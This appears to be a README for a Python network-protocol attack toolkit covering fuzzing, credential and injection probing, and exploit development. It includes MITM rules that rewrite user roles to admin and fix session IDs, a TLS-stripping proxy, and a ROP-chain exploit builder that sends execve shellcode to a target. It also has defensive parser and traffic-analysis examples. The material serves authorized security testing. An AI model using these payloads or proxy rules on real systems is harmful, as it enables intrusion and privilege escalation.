Source: https://sploitus.com/exploit?id=E07672B6-E349-5FE5-953E-0A86375F7597
# netproto_toolkit
Network protocol security research toolkit in Python, covering the full workflow from traffic capture through protocol fuzzing to exploit development and bug-bounty report generation.
Based on: **Attacking Network Protocols** by James Forshaw (No Starch Press)
> **AUTHORIZED USE ONLY**: for ethical security research, bug bounty programs, and penetration testing engagements where explicit written authorization has been obtained.
---
## Modules
| File | Coverage | Key classes |
|------|----------|-------------|
| `netproto_exploit_toolkit.py` | Ch9–10: core fuzzing & vuln probes | `RandomFuzzer`, `MutationFuzzer`, `TestCaseGenerator`, `AuthProber`, `InjectionProber`, `ExploitScaffold`, `CrashTriager`, `Reporter` |
| `netproto_protocol_modules.py` | Ch2–3, Ch10: protocol DSL, capture, MITM | `Packet`, `FieldAwareFuzzer`, `PortForwardProxy`, `MITMProxy`, `HTTPModule`, `FTPModule`, `DNSModule`, `SMTPModule`, `GenericTLVModule` |
| `netproto_advanced.py` | Ch10 extensions: coverage fuzzing, recon, exploit dev, reporting | `CoverageGuidedFuzzer`, `EntropyAnalyzer`, `FieldBoundaryDetector`, `CaptureDiff`, `CyclicPattern`, `ROPGadgetScanner`, `ShellcodeHelper`, `ExploitBuilder`, `BugBountyReport` |
| `netproto.py` | Unified entry point | dispatches to `fuzz \| proto \| adv` |
---
## Requirements
Python 3.9+; no third-party packages are required. All core functionality uses the standard library.
**Optional**: install `capstone` for full ROP gadget coverage in `ROPGadgetScanner`:
```bash
pip install capstone
```
---
## Quick start
```bash
git clone https://github.com/r3tr0xCTF/netproto_toolkit.git
cd netproto_toolkit
python3 netproto.py --help
```
---
## CLI reference
### `netproto fuzz`: core fuzzing modes
```bash
# Random fuzzer (like cat /dev/urandom | nc host port)
python3 netproto.py fuzz -t 192.168.1.100 -p 9999 -m random -n 1000
# Mutation fuzzer from a seed capture
python3 netproto.py fuzz -t 192.168.1.100 -p 9999 -m mutation --seed-file captured.bin -n 500
# Structured test cases (integer overflows, injections, path traversal)
python3 netproto.py fuzz -t 192.168.1.100 -p 9999 -m structured
# Default credential probe + user enumeration
python3 netproto.py fuzz -t 192.168.1.100 -p 9999 -m authprobe
# Injection probes (SQLi, CMDi, format strings, path traversal)
python3 netproto.py fuzz -t 192.168.1.100 -p 9999 -m inject
# PoC exploit scaffolds (stack overflow, integer overflow, auth bypass)
python3 netproto.py fuzz -t 192.168.1.100 -p 9999 -m exploit
# Run every mode in sequence and save report
python3 netproto.py fuzz -t 192.168.1.100 -p 9999 -m full -o results/report
```
### `netproto proto`: protocol-aware fuzzing & proxies
```bash
# HTTP fuzzer (paths, headers, methods)
python3 netproto.py proto http -t 192.168.1.100 -p 8080
# FTP fuzzer with authenticated session
python3 netproto.py proto ftp -t 192.168.1.100 -u anonymous -P anon@test.com
# DNS fuzzer (label lengths, compression loops, QTYPE boundaries, EDNS0)
python3 netproto.py proto dns -t 192.168.1.100
# SMTP envelope fuzzer
python3 netproto.py proto smtp -t 192.168.1.100 -p 25
# Passive capture proxy: saves every packet as a seed file
python3 netproto.py proto proxy --listen 8888 --remote-host target.local --remote-port 9999
# Active MITM proxy: inspect and modify traffic in both directions
python3 netproto.py proto mitm --listen 8888 --remote-host target.local --remote-port 9999
# MITM with a find/replace rule (e.g. downgrade an auth level)
python3 netproto.py proto mitm --listen 8888 --remote-host target.local --remote-port 9999 \
--find 'role=user' --replace 'role=admin' --direction C2S
# MITM with TLS stripping (self-signed cert generated automatically)
python3 netproto.py proto mitm --listen 443 --remote-host target.local --remote-port 443 \
--tls-client --tls-server --duration 120
```
### `netproto adv`: advanced tools
```bash
# Coverage-guided fuzzer from captured seeds
python3 netproto.py adv covfuzz -t 192.168.1.100 -p 9000 --seed-dir /tmp/seeds --iters 5000
# Per-position entropy analysis: reveals fixed fields vs dynamic data
python3 netproto.py adv entropy --seed-dir /tmp/seeds
# Field boundary detection + Packet DSL skeleton
python3 netproto.py adv recon --seed-dir /tmp/seeds --name MyProto
# Field boundary + capture diff classification
python3 netproto.py adv recon --seed-dir /tmp/seeds --name MyProto --diff
# ROP gadget scanner
python3 netproto.py adv rop --binary /path/to/target --base 0x400000
# Filter by mnemonic
python3 netproto.py adv rop --binary /path/to/target --find "pop rdi"
# De Bruijn cyclic pattern (for stack overflow offset discovery)
python3 netproto.py adv cyclic --length 2048 --output pattern.bin
# Find offset of a crash value in a previously generated pattern
python3 netproto.py adv cyclic --length 2048 --find 0x6161616261616163
# Generate a bug-bounty report from a saved session JSON
python3 netproto.py adv report --session results/report.json \
--program "Target App" --tester "Your Name" --output report.md
```
---
## Python API
### Protocol field DSL
```python
from netproto_protocol_modules import (
    Packet, U8, U16BE, U32BE,
    NulStrField, LenPrefixStrField, RawField, TLVField,
)

# Define a packet structure
login_pkt = Packet(
    "LOGIN",
    U8("tag", 0x01),
    U16BE("total_len", 0),
    LenPrefixStrField("username", ">H", b"admin"),
    LenPrefixStrField("password", ">H", b"admin"),
)

# Build the packet into bytes
raw = login_pkt.build()

# Parse bytes back into fields
login_pkt.parse(raw)
print(login_pkt.get("username"))  # b'admin'

# Generate every single-field mutation (keeps all other fields valid)
for field_name, variant_idx, mutated_bytes in login_pkt.field_mutations():
    print(f"{field_name}[{variant_idx}]: {mutated_bytes.hex()}")
```
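As an added illustration (not the toolkit's `Packet` class), here is a stand-alone builder and a strict parser for the LOGIN layout above; it assumes `total_len` counts every byte after the 3-byte header. The length checks are exactly what single-field mutations such as an oversized username length prefix probe for, so a receiver written this way rejects them instead of over-reading.

```python
import struct

# Added example, not the toolkit's Packet class: a builder and a strict parser
# for the LOGIN layout above. Assumes total_len counts every byte after the
# 3-byte header (tag + total_len) and that both strings carry a ">H" prefix.
#   tag:U8 | total_len:U16BE | ulen:U16BE | username | plen:U16BE | password

class MalformedPacket(ValueError):
    """Raised for any length field that disagrees with the bytes actually present."""

def build_login(username, password, tag=0x01):
    body = (struct.pack(">H", len(username)) + username
            + struct.pack(">H", len(password)) + password)
    return struct.pack(">BH", tag, len(body)) + body

def _read_lenprefix(buf, pos):
    """Read one ">H"-prefixed string, refusing to run past the end of buf."""
    if pos + 2 > len(buf):
        raise MalformedPacket(f"length prefix truncated at offset {pos}")
    (n,) = struct.unpack_from(">H", buf, pos)
    pos += 2
    if pos + n > len(buf):
        raise MalformedPacket(f"{n}-byte field at offset {pos} overruns buffer")
    return buf[pos:pos + n], pos + n

def parse_login(raw):
    if len(raw) < 3:
        raise MalformedPacket("header truncated")
    tag, total_len = struct.unpack_from(">BH", raw, 0)
    if tag != 0x01:
        raise MalformedPacket(f"unexpected tag 0x{tag:02x}")
    if total_len != len(raw) - 3:
        raise MalformedPacket(f"total_len {total_len} != body length {len(raw) - 3}")
    username, pos = _read_lenprefix(raw, 3)
    password, pos = _read_lenprefix(raw, pos)
    if pos != len(raw):
        raise MalformedPacket(f"{len(raw) - pos} trailing bytes after password")
    return {"tag": tag, "username": username, "password": password}

def rejects(raw):
    """True if the parser refuses raw; used to check mutated packets."""
    try:
        parse_login(raw)
    except MalformedPacket:
        return True
    return False
```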
### Field-aware fuzzer
```python
from netproto_exploit_toolkit import NetClient, FuzzSession
from netproto_protocol_modules import FieldAwareFuzzer

# login_pkt is the Packet defined in the DSL example above
client = NetClient("192.168.1.100", 9000)
session = FuzzSession(target="192.168.1.100", port=9000, protocol="MyProto")
fuzzer = FieldAwareFuzzer(client, login_pkt)
findings = fuzzer.run(session)
```
### Coverage-guided fuzzer
```python
from pathlib import Path
from netproto_advanced import CoverageGuidedFuzzer

# client and session are the NetClient / FuzzSession from the field-aware example above
seeds = [p.read_bytes() for p in Path("/tmp/seeds").glob("*.bin")]
fuzzer = CoverageGuidedFuzzer(client, seeds, max_corpus_size=500)
findings = fuzzer.run(session, max_iterations=5000)
print(fuzzer.coverage_summary())
```
### MITM proxy with packet-level hook
```python
import re
from netproto_protocol_modules import MITMProxy

proxy = MITMProxy("0.0.0.0", 8888, "target.local", 9999)

# Bytes find/replace rule
proxy.add_rule(b'"role":"user"', b'"role":"admin"', direction="C2S", label="privesc")

# Regex rule
proxy.add_rule(re.compile(rb"session_id=\w+"), b"session_id=AAAA", label="fixate")

# Arbitrary callback hook
def on_client(session, data):
    print(f"[sess {session.session_id}] C->S {len(data)}B")
    return data  # return modified bytes, or None to pass through unchanged

proxy.on_client_data = on_client
proxy.start()
```
### Exploit builder
```python
from netproto_advanced import CyclicPattern, ROPGadgetScanner, ShellcodeHelper, ExploitBuilder

# 1. Find the overflow offset
pattern = CyclicPattern.generate(2048)
offset = CyclicPattern.find_offset_int(pattern, 0x6161616261616163)  # RIP from debugger

# 2. Scan the binary for gadgets
scanner = ROPGadgetScanner.from_file("/path/to/target", base_addr=0x400000)
pop_rdi = scanner.find("pop rdi")[0].offset

# 3. Assemble the payload
payload = (
    ExploitBuilder(offset=offset)
    .set_ret(pop_rdi)
    .add_rop(0x601060)  # address of /bin/sh string
    .add_rop(0x400550)  # address of system()
    .set_nop_sled(16)
    .set_shellcode(ShellcodeHelper.EXECVE_SH_X64)
    .set_bad_bytes([0x00, 0x0a])
    .note(f"offset={offset}, pop_rdi=0x{pop_rdi:x}")
)
print(payload.hexdump())
payload.send("192.168.1.100", 9999)
```
### Bug bounty report
```python
from netproto_advanced import BugBountyReport

report = BugBountyReport(
    session=session,
    program_name="Target Application",
    target_url="https://target.example.com",
    tester="Your Name",
)
report.print_summary()
report.save("report.md", fmt="markdown")  # HackerOne / Bugcrowd ready
report.save("report.json", fmt="json")    # machine-readable
```
---
## Protocol recon workflow
1. Capture seeds: `netproto proto proxy` → `/tmp/seeds/*.bin`
2. Analyse structure: `netproto adv entropy` → fixed vs dynamic bytes
3. Detect boundaries: `netproto adv recon` → skeleton Packet DSL
4. Refine DSL: edit the generated Packet definition in Python
5. Field-aware fuzz: `FieldAwareFuzzer` → targeted mutations per field
6. Coverage fuzz: `CoverageGuidedFuzzer` → novel server paths via response signals
7. Triage crashes: `CrashTriager` → GDB script + ASan rebuild command
8. Report: `BugBountyReport` → CVSS v3.1, CWE, markdown / JSON
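Steps 2 and 3 of this workflow in code, as an added example rather than the toolkit's `EntropyAnalyzer` or `FieldBoundaryDetector`, run over a constructed six-capture corpus of a made-up protocol: per-offset Shannon entropy separates constant bytes from changing ones, a monotonicity check in capture order separates a counter from a nonce, and adjacent offsets with the same label collapse into candidate fields for the DSL skeleton.

```python
import math
from collections import Counter

# Constructed corpus (added example, not the toolkit's EntropyAnalyzer or
# FieldBoundaryDetector): six captures, in capture order, of a made-up protocol:
#   magic(2) | seq(2, counter) | flags(1, constant) | nonce(4, random) | "hello"
SEEDS = [
    bytes.fromhex("4e50" "0001" "80" "1a2b3c4d" "68656c6c6f"),
    bytes.fromhex("4e50" "0002" "80" "9f0e1d2c" "68656c6c6f"),
    bytes.fromhex("4e50" "0003" "80" "77a1b2c3" "68656c6c6f"),
    bytes.fromhex("4e50" "0004" "80" "05ee41d0" "68656c6c6f"),
    bytes.fromhex("4e50" "0005" "80" "c3d4e5f6" "68656c6c6f"),
    bytes.fromhex("4e50" "0006" "80" "3b4a5968" "68656c6c6f"),
]

def position_entropy(seeds):
    """Shannon entropy in bits of the byte value at each offset, across all seeds."""
    width = min(len(s) for s in seeds)
    n = len(seeds)
    result = []
    for i in range(width):
        counts = Counter(s[i] for s in seeds)
        result.append(-sum(c / n * math.log2(c / n) for c in counts.values()))
    return result

def classify_positions(seeds):
    """Label each offset: 'fixed' (entropy 0), 'counter' (strictly increasing
    in capture order), otherwise 'variable' (session ids, nonces, payload)."""
    labels = []
    for i, h in enumerate(position_entropy(seeds)):
        column = [s[i] for s in seeds]
        if h == 0.0:
            labels.append("fixed")
        elif all(a < b for a, b in zip(column, column[1:])):
            labels.append("counter")
        else:
            labels.append("variable")
    return labels

def field_boundaries(seeds):
    """Collapse adjacent offsets with the same label into (start, end, label) runs;
    each run is a candidate field for the Packet DSL skeleton."""
    runs = []
    for i, label in enumerate(classify_positions(seeds)):
        if runs and runs[-1][2] == label:
            runs[-1] = (runs[-1][0], i + 1, label)
        else:
            runs.append((i, i + 1, label))
    return runs
```

The high byte of the sequence counter never changed across six captures, so it is merged into the leading fixed run together with the magic; that kind of misread is what step 4 corrects by hand.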
---
## Tests
```bash
python3 tests/test_netproto_toolkit.py
# 56 tests: 56 passed, 0 failed.
```
No network access is required; the tests cover only pure-computation functions.
---
## License
For educational and authorized security research use only. See individual module headers for details.